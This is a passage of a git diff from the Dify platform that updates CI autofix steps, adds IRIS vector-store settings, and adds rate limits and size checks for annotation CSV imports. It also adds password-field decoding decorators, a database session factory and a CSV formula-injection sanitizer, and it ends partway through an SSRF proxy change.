" + } >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 81392a9734..d7a58ce93d 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -13,11 +13,12 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - # Use uv to ensure we have the same ruff version in CI and locally. - - uses: astral-sh/setup-uv@v6 + - uses: actions/setup-python@v5 with: python-version: "3.11" + + - uses: astral-sh/setup-uv@v6 + - run: | cd api uv sync --dev @@ -35,10 +36,11 @@ jobs: - name: ast-grep run: | - uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all + # ast-grep exits 1 if no matches are found; allow idempotent runs. + uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true # Convert Optional[T] to T | None (ignoring quoted types) cat > /tmp/optional-rule.yml << 'EOF' id: convert-optional-to-union @@ -56,14 +58,15 @@ jobs: pattern: $T fix: $T | None EOF - uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all + uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all # Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax) find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \; find . -name "*.py.bak" -type f -delete + # mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter. - name: mdformat run: | - uvx mdformat . + uvx --python 3.13 mdformat . --exclude ".claude/skills/**" - name: Install pnpm uses: pnpm/action-setup@v4 @@ -84,7 +87,6 @@ jobs: - name: oxlint working-directory: ./web - run: | - pnpx oxlint --fix + run: pnpm exec oxlint --config .oxlintrc.json --fix . - uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27 diff --git a/.gitignore b/.gitignore index 79ba44b207..5ad728c3da 100644 --- a/.gitignore +++ b/.gitignore @@ -189,6 +189,7 @@ docker/volumes/matrixone/* docker/volumes/mysql/* docker/volumes/seekdb/* !docker/volumes/oceanbase/init.d +docker/volumes/iris/* docker/nginx/conf.d/default.conf docker/nginx/ssl/* diff --git a/.windsurf/rules/testing.md b/.windsurf/rules/testing.md deleted file mode 100644 index 64fec20cb8..0000000000 --- a/.windsurf/rules/testing.md +++ /dev/null @@ -1,5 +0,0 @@ -# Windsurf Testing Rules - -- Use `web/testing/testing.md` as the single source of truth for frontend automated testing. -- Honor every requirement in that document when generating or accepting tests. -- When proposing or saving tests, re-read that document and follow every requirement. diff --git a/api/.env.example b/api/.env.example index 516a119d98..4806429972 100644 --- a/api/.env.example +++ b/api/.env.example @@ -660,3 +660,14 @@ SINGLE_CHUNK_ATTACHMENT_LIMIT=10 ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 diff --git a/api/app_factory.py b/api/app_factory.py index 3a3ee03cff..026310a8aa 100644 --- a/api/app_factory.py +++ b/api/app_factory.py @@ -83,6 +83,7 @@ def initialize_extensions(app: DifyApp): ext_redis, ext_request_logging, ext_sentry, + ext_session_factory, ext_set_secretkey, ext_storage, ext_timezone, @@ -114,6 +115,7 @@ def initialize_extensions(app: DifyApp): ext_commands, ext_otel, ext_request_logging, + ext_session_factory, ] for ext in extensions: short_name = ext.__name__.split(".")[-1] diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index a5916241df..e16ca52f46 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -380,6 +380,37 @@ class FileUploadConfig(BaseSettings): default=60, ) + # Annotation Import Security Configurations + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed CSV file size for annotation import in megabytes", + default=2, + ) + + ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field( + description="Maximum number of annotation records allowed in a single import", + default=10000, + ) + + ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field( + description="Minimum number of annotation records required in a single import", + default=1, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field( + description="Maximum number of annotation import requests per minute per tenant", + default=5, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field( + description="Maximum number of annotation import requests per hour per tenant", + default=20, + ) + + ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field( + description="Maximum number of concurrent annotation import tasks per tenant", + default=2, + ) + inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field( description=( "Comma-separated list of file extensions that are blocked from upload. " diff --git a/api/configs/middleware/__init__.py b/api/configs/middleware/__init__.py index a5e35c99ca..63f75924bf 100644 --- a/api/configs/middleware/__init__.py +++ b/api/configs/middleware/__init__.py @@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig from .vdb.couchbase_config import CouchbaseConfig from .vdb.elasticsearch_config import ElasticsearchConfig from .vdb.huawei_cloud_config import HuaweiCloudConfig +from .vdb.iris_config import IrisVectorConfig from .vdb.lindorm_config import LindormConfig from .vdb.matrixone_config import MatrixoneConfig from .vdb.milvus_config import MilvusConfig @@ -106,7 +107,7 @@ class KeywordStoreConfig(BaseSettings): class DatabaseConfig(BaseSettings): # Database type selector - DB_TYPE: Literal["postgresql", "mysql", "oceanbase"] = Field( + DB_TYPE: Literal["postgresql", "mysql", "oceanbase", "seekdb"] = Field( description="Database type to use. OceanBase is MySQL-compatible.", default="postgresql", ) @@ -336,6 +337,7 @@ class MiddlewareConfig( ChromaConfig, ClickzettaConfig, HuaweiCloudConfig, + IrisVectorConfig, MilvusConfig, AlibabaCloudMySQLConfig, MyScaleConfig, diff --git a/api/configs/middleware/vdb/iris_config.py b/api/configs/middleware/vdb/iris_config.py new file mode 100644 index 0000000000..c532d191c3 --- /dev/null +++ b/api/configs/middleware/vdb/iris_config.py @@ -0,0 +1,91 @@ +"""Configuration for InterSystems IRIS vector database.""" + +from pydantic import Field, PositiveInt, model_validator +from pydantic_settings import BaseSettings + + +class IrisVectorConfig(BaseSettings): + """Configuration settings for IRIS vector database connection and pooling.""" + + IRIS_HOST: str | None = Field( + description="Hostname or IP address of the IRIS server.", + default="localhost", + ) + + IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field( + description="Port number for IRIS connection.", + default=1972, + ) + + IRIS_USER: str | None = Field( + description="Username for IRIS authentication.", + default="_SYSTEM", + ) + + IRIS_PASSWORD: str | None = Field( + description="Password for IRIS authentication.", + default="Dify@1234", + ) + + IRIS_SCHEMA: str | None = Field( + description="Schema name for IRIS tables.", + default="dify", + ) + + IRIS_DATABASE: str | None = Field( + description="Database namespace for IRIS connection.", + default="USER", + ) + + IRIS_CONNECTION_URL: str | None = Field( + description="Full connection URL for IRIS (overrides individual fields if provided).", + default=None, + ) + + IRIS_MIN_CONNECTION: PositiveInt = Field( + description="Minimum number of connections in the pool.", + default=1, + ) + + IRIS_MAX_CONNECTION: PositiveInt = Field( + description="Maximum number of connections in the pool.", + default=3, + ) + + IRIS_TEXT_INDEX: bool = Field( + description="Enable full-text search index using %iFind.Index.Basic.", + default=True, + ) + + IRIS_TEXT_INDEX_LANGUAGE: str = Field( + description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').", + default="en", + ) + + @model_validator(mode="before") + @classmethod + def validate_config(cls, values: dict) -> dict: + """Validate IRIS configuration values. + + Args: + values: Configuration dictionary + + Returns: + Validated configuration dictionary + + Raises: + ValueError: If required fields are missing or pool settings are invalid + """ + # Only validate required fields if IRIS is being used as the vector store + # This allows the config to be loaded even when IRIS is not in use + + # vector_store = os.environ.get("VECTOR_STORE", "") + # We rely on Pydantic defaults for required fields if they are missing from env. + # Strict existence check is removed to allow defaults to work. + + min_conn = values.get("IRIS_MIN_CONNECTION", 1) + max_conn = values.get("IRIS_MAX_CONNECTION", 3) + if min_conn > max_conn: + raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION") + + return values diff --git a/api/controllers/console/admin.py b/api/controllers/console/admin.py index 7aa1e6dbd8..a25ca5ef51 100644 --- a/api/controllers/console/admin.py +++ b/api/controllers/console/admin.py @@ -6,19 +6,20 @@ from flask import request from flask_restx import Resource from pydantic import BaseModel, Field, field_validator from sqlalchemy import select -from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound, Unauthorized -P = ParamSpec("P") -R = TypeVar("R") from configs import dify_config from constants.languages import supported_language from controllers.console import console_ns from controllers.console.wraps import only_edition_cloud +from core.db.session_factory import session_factory from extensions.ext_database import db from libs.token import extract_access_token from models.model import App, InstalledApp, RecommendedApp +P = ParamSpec("P") +R = TypeVar("R") + DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}" @@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource): privacy_policy = site.privacy_policy or payload.privacy_policy or "" custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or "" - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id) ).scalar_one_or_none() @@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource): @only_edition_cloud @admin_required def delete(self, app_id): - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == str(app_id)) ).scalar_one_or_none() @@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource): if not recommended_app: return {"result": "success"}, 204 - with Session(db.engine) as session: + with session_factory.create_session() as session: app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none() if app: app.is_public = False - with Session(db.engine) as session: + with session_factory.create_session() as session: installed_apps = ( session.execute( select(InstalledApp).where( diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 3b6fb58931..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import request +from flask import abort, make_response, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError from controllers.console import console_ns from controllers.console.wraps import ( account_initialization_required, + annotation_import_concurrency_limit, + annotation_import_rate_limit, cloud_edition_billing_resource_check, edit_permission_required, setup_required, @@ -257,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -272,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") @@ -314,18 +322,25 @@ class AnnotationUpdateDeleteApi(Resource): @console_ns.route("/apps//annotations/batch-import") class AnnotationBatchImportApi(Resource): @console_ns.doc("batch_import_annotations") - @console_ns.doc(description="Batch import annotations from CSV file") + @console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response(200, "Batch import started successfully") @console_ns.response(403, "Insufficient permissions") @console_ns.response(400, "No file uploaded or too many files") + @console_ns.response(413, "File too large") + @console_ns.response(429, "Too many requests or concurrent imports") @setup_required @login_required @account_initialization_required @cloud_edition_billing_resource_check("annotation") + @annotation_import_rate_limit + @annotation_import_concurrency_limit @edit_permission_required def post(self, app_id): + from configs import dify_config + app_id = str(app_id) + # check file if "file" not in request.files: raise NoFileUploadedError() @@ -335,9 +350,27 @@ class AnnotationBatchImportApi(Resource): # get file from request file = request.files["file"] + # check file type if not file.filename or not file.filename.lower().endswith(".csv"): raise ValueError("Invalid file type. Only CSV files are allowed") + + # Check file size before processing + file.seek(0, 2) # Seek to end of file + file_size = file.tell() + file.seek(0) # Reset to beginning + + max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + if file_size > max_size_bytes: + abort( + 413, + f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. " + f"Please reduce the file size and try again.", + ) + + if file_size == 0: + raise ValueError("The uploaded file is empty") + return AppAnnotationService.batch_import_app_annotations(app_id, file) diff --git a/api/controllers/console/auth/login.py b/api/controllers/console/auth/login.py index f486f4c313..772d98822e 100644 --- a/api/controllers/console/auth/login.py +++ b/api/controllers/console/auth/login.py @@ -22,7 +22,12 @@ from controllers.console.error import ( NotAllowedCreateWorkspace, WorkspacesLimitExceeded, ) -from controllers.console.wraps import email_password_login_enabled, setup_required +from controllers.console.wraps import ( + decrypt_code_field, + decrypt_password_field, + email_password_login_enabled, + setup_required, +) from events.tenant_event import tenant_was_created from libs.helper import EmailStr, extract_remote_ip from libs.login import current_account_with_tenant @@ -79,6 +84,7 @@ class LoginApi(Resource): @setup_required @email_password_login_enabled @console_ns.expect(console_ns.models[LoginPayload.__name__]) + @decrypt_password_field def post(self): """Authenticate user and login.""" args = LoginPayload.model_validate(console_ns.payload) @@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource): class EmailCodeLoginApi(Resource): @setup_required @console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__]) + @decrypt_code_field def post(self): args = EmailCodeLoginPayload.model_validate(console_ns.payload) diff --git a/api/controllers/console/datasets/data_source.py b/api/controllers/console/datasets/data_source.py index 01f268d94d..cd958bbb36 100644 --- a/api/controllers/console/datasets/data_source.py +++ b/api/controllers/console/datasets/data_source.py @@ -140,6 +140,18 @@ class DataSourceNotionListApi(Resource): credential_id = request.args.get("credential_id", default=None, type=str) if not credential_id: raise ValueError("Credential id is required.") + + # Get datasource_parameters from query string (optional, for GitHub and other datasources) + datasource_parameters_str = request.args.get("datasource_parameters", default=None, type=str) + datasource_parameters = {} + if datasource_parameters_str: + try: + datasource_parameters = json.loads(datasource_parameters_str) + if not isinstance(datasource_parameters, dict): + raise ValueError("datasource_parameters must be a JSON object.") + except json.JSONDecodeError: + raise ValueError("Invalid datasource_parameters JSON format.") + datasource_provider_service = DatasourceProviderService() credential = datasource_provider_service.get_datasource_credentials( tenant_id=current_tenant_id, @@ -187,7 +199,7 @@ class DataSourceNotionListApi(Resource): online_document_result: Generator[OnlineDocumentPagesMessage, None, None] = ( datasource_runtime.get_online_document_pages( user_id=current_user.id, - datasource_parameters={}, + datasource_parameters=datasource_parameters, provider_type=datasource_runtime.datasource_provider_type(), ) ) @@ -218,14 +230,14 @@ class DataSourceNotionListApi(Resource): @console_ns.route( - "/notion/workspaces//pages///preview", + "/notion/pages///preview", "/datasets/notion-indexing-estimate", ) class DataSourceNotionApi(Resource): @setup_required @login_required @account_initialization_required - def get(self, workspace_id, page_id, page_type): + def get(self, page_id, page_type): _, current_tenant_id = current_account_with_tenant() credential_id = request.args.get("credential_id", default=None, type=str) @@ -239,11 +251,10 @@ class DataSourceNotionApi(Resource): plugin_id="langgenius/notion_datasource", ) - workspace_id = str(workspace_id) page_id = str(page_id) extractor = NotionExtractor( - notion_workspace_id=workspace_id, + notion_workspace_id="", notion_obj_id=page_id, notion_page_type=page_type, notion_access_token=credential.get("integration_secret"), diff --git a/api/controllers/console/datasets/datasets.py b/api/controllers/console/datasets/datasets.py index 70b6e932e9..ea21c4480d 100644 --- a/api/controllers/console/datasets/datasets.py +++ b/api/controllers/console/datasets/datasets.py @@ -223,6 +223,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.COUCHBASE, VectorType.OPENGAUSS, VectorType.OCEANBASE, + VectorType.SEEKDB, VectorType.TABLESTORE, VectorType.HUAWEI_CLOUD, VectorType.TENCENT, @@ -230,6 +231,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.CLICKZETTA, VectorType.BAIDU, VectorType.ALIBABACLOUD_MYSQL, + VectorType.IRIS, } semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]} diff --git a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py index debe8eed97..46d67f0581 100644 --- a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py +++ b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py @@ -4,7 +4,7 @@ from typing import Any, Literal, cast from uuid import UUID from flask import abort, request -from flask_restx import Resource, marshal_with # type: ignore +from flask_restx import Resource, marshal_with, reqparse # type: ignore from pydantic import BaseModel, Field from sqlalchemy.orm import Session from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -975,6 +975,11 @@ class RagPipelineRecommendedPluginApi(Resource): @login_required @account_initialization_required def get(self): + parser = reqparse.RequestParser() + parser.add_argument("type", type=str, location="args", required=False, default="all") + args = parser.parse_args() + type = args["type"] + rag_pipeline_service = RagPipelineService() - recommended_plugins = rag_pipeline_service.get_recommended_plugins() + recommended_plugins = rag_pipeline_service.get_recommended_plugins(type) return recommended_plugins diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index f40f566a36..95fc006a12 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar from flask import abort, request from configs import dify_config +from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError from controllers.console.workspace.error import AccountNotInitializedError from enums.cloud_plan import CloudPlan from extensions.ext_database import db from extensions.ext_redis import redis_client +from libs.encryption import FieldEncryption from libs.login import current_account_with_tenant from models.account import AccountStatus from models.dataset import RateLimitLog @@ -25,6 +27,14 @@ from .error import NotInitValidateError, NotSetupError, UnauthorizedAndForceLogo P = ParamSpec("P") R = TypeVar("R") +# Field names for decryption +FIELD_NAME_PASSWORD = "password" +FIELD_NAME_CODE = "code" + +# Error messages for decryption failures +ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data" +ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code" + def account_initialization_required(view: Callable[P, R]): @wraps(view) @@ -331,3 +341,163 @@ def is_admin_or_owner_required(f: Callable[P, R]): return f(*args, **kwargs) return decorated_function + + +def annotation_import_rate_limit(view: Callable[P, R]): + """ + Rate limiting decorator for annotation import operations. + + Implements sliding window rate limiting with two tiers: + - Short-term: Configurable requests per minute (default: 5) + - Long-term: Configurable requests per hour (default: 20) + + Uses Redis ZSET for distributed rate limiting across multiple instances. + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + # Check per-minute rate limit + minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min" + redis_client.zadd(minute_key, {current_time: current_time}) + redis_client.zremrangebyscore(minute_key, 0, current_time - 60000) + minute_count = redis_client.zcard(minute_key) + redis_client.expire(minute_key, 120) # 2 minutes TTL + + if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} " + f"requests per minute allowed. Please try again later.", + ) + + # Check per-hour rate limit + hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour" + redis_client.zadd(hour_key, {current_time: current_time}) + redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000) + hour_count = redis_client.zcard(hour_key) + redis_client.expire(hour_key, 7200) # 2 hours TTL + + if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} " + f"requests per hour allowed. Please try again later.", + ) + + return view(*args, **kwargs) + + return decorated + + +def annotation_import_concurrency_limit(view: Callable[P, R]): + """ + Concurrency control decorator for annotation import operations. + + Limits the number of concurrent import tasks per tenant to prevent + resource exhaustion and ensure fair resource allocation. + + Uses Redis ZSET to track active import jobs with automatic cleanup + of stale entries (jobs older than 2 minutes). + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + + # Clean up stale entries (jobs that should have completed or timed out) + stale_threshold = current_time - 120000 # 2 minutes ago + redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold) + + # Check current active job count + active_count = redis_client.zcard(active_jobs_key) + + if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT: + abort( + 429, + f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} " + f"concurrent imports allowed per workspace. Please wait for existing imports to complete.", + ) + + # Allow the request to proceed + # The actual job registration will happen in the service layer + return view(*args, **kwargs) + + return decorated + + +def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None: + """ + Helper to decode a Base64 encoded field in the request payload. + + Args: + field_name: Name of the field to decode + error_class: Exception class to raise on decoding failure + error_message: Error message to include in the exception + """ + if not request or not request.is_json: + return + # Get the payload dict - it's cached and mutable + payload = request.get_json() + if not payload or field_name not in payload: + return + encoded_value = payload[field_name] + decoded_value = FieldEncryption.decrypt_field(encoded_value) + + # If decoding failed, raise error immediately + if decoded_value is None: + raise error_class(error_message) + + # Update payload dict in-place with decoded value + # Since payload is a mutable dict and get_json() returns the cached reference, + # modifying it will affect all subsequent accesses including console_ns.payload + payload[field_name] = decoded_value + + +def decrypt_password_field(view: Callable[P, R]): + """ + Decorator to decrypt password field in request payload. + + Automatically decrypts the 'password' field if encryption is enabled. + If decryption fails, raises AuthenticationFailedError. + + Usage: + @decrypt_password_field + def post(self): + args = LoginPayload.model_validate(console_ns.payload) + # args.password is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA) + return view(*args, **kwargs) + + return decorated + + +def decrypt_code_field(view: Callable[P, R]): + """ + Decorator to decrypt verification code field in request payload. + + Automatically decrypts the 'code' field if encryption is enabled. + If decryption fails, raises EmailCodeError. + + Usage: + @decrypt_code_field + def post(self): + args = EmailCodeLoginPayload.model_validate(console_ns.payload) + # args.code is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE) + return view(*args, **kwargs) + + return decorated diff --git a/api/controllers/service_api/app/completion.py b/api/controllers/service_api/app/completion.py index b7fb01c6fe..b3836f3a47 100644 --- a/api/controllers/service_api/app/completion.py +++ b/api/controllers/service_api/app/completion.py @@ -61,6 +61,9 @@ class ChatRequestPayload(BaseModel): @classmethod def normalize_conversation_id(cls, value: str | UUID | None) -> str | None: """Allow missing or blank conversation IDs; enforce UUID format when provided.""" + if isinstance(value, str): + value = value.strip() + if not value: return None diff --git a/api/core/db/__init__.py b/api/core/db/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/db/session_factory.py b/api/core/db/session_factory.py new file mode 100644 index 0000000000..1dae2eafd4 --- /dev/null +++ b/api/core/db/session_factory.py @@ -0,0 +1,38 @@ +from sqlalchemy import Engine +from sqlalchemy.orm import Session, sessionmaker + +_session_maker: sessionmaker | None = None + + +def configure_session_factory(engine: Engine, expire_on_commit: bool = False): + """Configure the global session factory""" + global _session_maker + _session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit) + + +def get_session_maker() -> sessionmaker: + if _session_maker is None: + raise RuntimeError("Session factory not configured. Call configure_session_factory() first.") + return _session_maker + + +def create_session() -> Session: + return get_session_maker()() + + +# Class wrapper for convenience +class SessionFactory: + @staticmethod + def configure(engine: Engine, expire_on_commit: bool = False): + configure_session_factory(engine, expire_on_commit) + + @staticmethod + def get_session_maker() -> sessionmaker: + return get_session_maker() + + @staticmethod + def create_session() -> Session: + return create_session() + + +session_factory = SessionFactory() diff --git a/api/core/entities/knowledge_entities.py b/api/core/entities/knowledge_entities.py index bed3a35400..d4093b5245 100644 --- a/api/core/entities/knowledge_entities.py +++ b/api/core/entities/knowledge_entities.py @@ -1,4 +1,4 @@ -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator class PreviewDetail(BaseModel): @@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel): class PipelineDataset(BaseModel): id: str name: str - description: str | None = Field(default="", description="knowledge dataset description") + description: str = Field(default="", description="knowledge dataset description") chunk_structure: str + @field_validator("description", mode="before") + @classmethod + def normalize_description(cls, value: str | None) -> str: + """Coerce None to empty string so description is always a string.""" + if value is None: + return "" + return value + class PipelineDocument(BaseModel): id: str diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. + """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. + + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. + + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. + + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid 